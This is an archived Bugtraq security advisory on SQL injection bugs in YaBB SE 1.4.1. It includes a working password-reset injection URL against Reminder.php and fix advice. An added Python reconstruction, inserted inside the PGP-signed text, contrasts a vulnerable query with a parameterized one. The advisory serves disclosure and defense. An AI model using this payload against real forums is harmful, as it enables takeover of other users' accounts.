[28485] in bugtraq

[VSA0306] YABBSE 1.4.1 SQL Injection Bugs

daemon@ATHENA.MIT.EDU (VOID.AT Security)
Mon Jan 20 19:16:51 2003

Date: Sat, 11 Jan 2003 01:31:05 +0100
From: "VOID.AT Security" <crew@void.at>
To: bugtraq@securityfocus.com
Message-ID: <20030111003105.GA9487@moon.void.at>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Subject: [void.at SA] YaBB SE SQL Injection Bugs

[void.at Security Advisory VSA0306]

YaBB SE is a web based forum written in PHP.

Overview
- --------

Due to SQL injection bugs, a remote user without an account can gain
access to other users' accounts by resetting a password or by
explicitly setting one.

Affected Versions
- -----------------

1.4.1
possibly others

Details
- -------

see Reminder.php

Solution
- --------

To fix this bug, enable magic_quotes_gpc in your php.ini or filter the
user input for special characters (escape every value before it is
placed into an SQL statement). Note that magic_quotes_gpc is a global
workaround rather than a fix of the affected queries themselves.


Exploit
- -------

There are two ways to exploit this vulnerability

* Reset User Password Vulnerability
  http://www.myserver.com/yabbse/Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername]

* Set Any User Password Vulnerability

  You can only set the password for users that were added after your
  account, because of the SQL structure.
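As an added illustration, not part of the advisory and not YaBB SE's own code, the following Python reconstructs the query pattern behind the Reminder.php payload above against an in-memory SQLite table. Only the parameter name `user` and the column `memberName` come from the advisory; the table layout, the other column names, the account rows and the `lookup_*` functions are constructed for the example (the real forum used PHP and MySQL). It shows how the injected quote turns a lookup of one account into a lookup that also matches the victim, and how a bound parameter keeps the same input inside the string value.

```python
"""Reconstruction of the Reminder.php 'user' injection with sqlite3.

Added example; schema and data are constructed, not taken from YaBB SE.
"""
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The exploit URL from the advisory, with attacker/admin as constructed names.
EXPLOIT_URL = ("http://www.myserver.com/yabbse/Reminder.php"
               "?searchtype=esearch&user=attacker'%20or%20memberName='admin")


def make_db():
    """Constructed members table; memberName is the column named in the payload."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members ("
        "  ID_MEMBER INTEGER PRIMARY KEY,"
        "  memberName TEXT NOT NULL,"
        "  emailAddress TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO members (memberName, emailAddress) VALUES (?, ?)",
        [("admin", "admin@example.invalid"),
         ("alice", "alice@example.invalid"),
         ("attacker", "attacker@example.invalid")],
    )
    return conn


def user_from_url(url):
    """Return the ?user= parameter as the script would receive it (URL-decoded)."""
    return parse_qs(urlsplit(url).query)["user"][0]


def lookup_vulnerable(conn, user):
    """Mirrors the flaw: the request parameter is pasted straight into the SQL.

    With user = "attacker' or memberName='admin" the statement becomes
    ... WHERE memberName='attacker' or memberName='admin'
    so the reminder logic now also operates on the admin account.
    """
    sql = ("SELECT memberName, emailAddress FROM members "
           f"WHERE memberName='{user}' ORDER BY memberName")
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, user):
    """Hardened form: a bound parameter; the quote and the OR stay inside the value."""
    sql = ("SELECT memberName, emailAddress FROM members "
           "WHERE memberName=? ORDER BY memberName")
    return conn.execute(sql, (user,)).fetchall()


def reminder_targets(conn, url, vulnerable):
    """Addresses a password reminder for this request would be sent to."""
    lookup = lookup_vulnerable if vulnerable else lookup_fixed
    return sorted(email for _, email in lookup(conn, user_from_url(url)))


if __name__ == "__main__":
    db = make_db()
    print("decoded user parameter:", user_from_url(EXPLOIT_URL))
    print("vulnerable query hits  :", reminder_targets(db, EXPLOIT_URL, True))
    print("parameterized query    :", reminder_targets(db, EXPLOIT_URL, False))
```

Running it shows the vulnerable lookup returning both the attacker's and the admin's rows for a single request, while the parameterized lookup returns nothing because no account is literally named `attacker' or memberName='admin`. Escaping the input (what magic_quotes_gpc did for PHP) blocks this particular payload in the same way, but binding parameters removes the class of bug rather than one character.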

Discovered by
- -------------

crew@void.at 

Credits
- -------
void.at

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAj4fZQkACgkQzxi8qAgTjUOM+gCfRbRObKdDQ155OmG7rkGc1HNM
nn4AoJDBOElOqbKSA2MJJ5R/AqhnyVJm
=3q3M
-----END PGP SIGNATURE-----
